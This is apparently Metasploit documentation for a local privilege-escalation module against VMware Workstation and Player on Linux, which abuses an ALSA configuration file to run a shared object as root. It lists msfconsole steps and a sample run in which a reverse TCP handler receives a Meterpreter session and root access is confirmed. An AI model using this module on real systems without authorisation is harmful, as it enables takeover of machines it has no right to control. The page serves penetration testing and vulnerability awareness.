Brendan Coles
1.9 KiB
Description
This module exploits a vulnerability in VMware Workstation Pro and Player before version 12.5.6 on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card.
Vulnerable Application
VMware Workstation Pro and VMware Workstation Player are the industry standard for running multiple operating systems as virtual machines on a single PC. Thousands of IT professionals, developers and businesses use Workstation Pro and Workstation Player to be more agile, more productive and more secure every day.
This module has been tested successfully on:
- VMware Player version 12.5.0 on Debian Linux
Verification Steps
- Start
msfconsole - Get a session
- Do:
use exploit/linux/local/vmware_alsa_config - Do:
set SESSION [SESSION] - Do:
check - Do:
run - You should get a new root session
Options
SESSION
Which session to use, which can be viewed with sessions
WritableDir
A writable directory file system path. (default: /tmp)
Scenarios
msf exploit(vmware_alsa_config) > check
[!] SESSION may not be compatible with this module.
[+] Target version is vulnerable
[+] The target is vulnerable.
msf exploit(vmware_alsa_config) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] Target version is vulnerable
[*] Launching VMware Player...
[*] Meterpreter session 2 opened (172.16.191.181:4444 -> 172.16.191.221:33807) at 2017-06-23 08:22:11 -0400
[*] Removing /tmp/.baVu7FwzlaIQyp
[*] Removing /home/user/.asoundrc
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.221
OS : Debian 8.8 (Linux 3.16.0-4-amd64)
Architecture : x64
Meterpreter : x64/linux